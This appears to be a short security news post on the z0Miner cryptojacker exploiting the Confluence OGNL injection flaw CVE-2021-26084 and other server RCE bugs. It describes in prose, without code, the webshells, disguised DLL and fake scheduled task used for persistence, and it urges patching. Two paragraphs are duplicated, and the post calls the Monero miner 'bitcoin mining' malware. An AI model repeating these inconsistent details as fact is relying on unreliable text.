Bobos & Wojaks

Get Rich Or Die Tryin

Cryptocurrency Miner Is Exploiting A New Bug

According to Trend Micro researchers, the bitcoin mining malware is currently targeting a recently disclosed Atlassian Confluence remote code execution (RCE) vulnerability, which was only made public in August of this year.

 

The major security hole, with a CVSS severity score of 9.8, is an Object-Graph Navigation Language (ONGL) injection vulnerability that may be abused to trigger RCE – and is known to be being exploited in the wild.

 

 

 

According to Trend Micro researchers, the bitcoin mining malware is currently targeting a recently disclosed Atlassian Confluence remote code execution (RCE) vulnerability, which was only made public in August of this year.

 

The major security hole, with a CVSS severity score of 9.8, is an Object-Graph Navigation Language (ONGL) injection vulnerability that may be abused to trigger RCE – and is known to be being exploited in the wild.

 

Benny Jacob reported the issue to Atlassian’s bug bounty programs.

 

The RCE, as well as Oracle’s WebLogic Server RCE (CVE-2020-14882) and ElasticSearch RCE (CVE-2015-1427), Jenkins, and other code execution issues in major server software, have been exploited by z0Miner, a Trojan and bitcoin mining bundle.

 

Once a vulnerable server has been found and the vulnerability has been used to obtain remote access, the malware will deploy a set of webshells to install and execute malicious files, including a .dll file disguised as a Hyper-V integration service, as well as a scheduled task that pretends to be a legitimate .NET Framework NGEN task.

 

The task will attempt to download and run malicious scripts from a Pastebin repository, but the URL has already been pulled.

 

These early activities are designed to keep an infected machine alive. z0Miner will then search and delete any rival cryptocurrency miners installed on the server in its second stage payload deployment before activating its own — a miner that takes computing resources to generate Monero (XMR).

 

A patch has been released to address CVE-2021-26084, and because threat actors will always seek to exploit new bugs for their own purposes – the Microsoft Exchange Server attacks being a prime example – vulnerable systems should be updated with new security fixes as soon as possible by IT administrators.

The z0Miner cryptojacker is now weaponizing a new Confluence vulnerability to mine for cryptocurrency on vulnerable machines.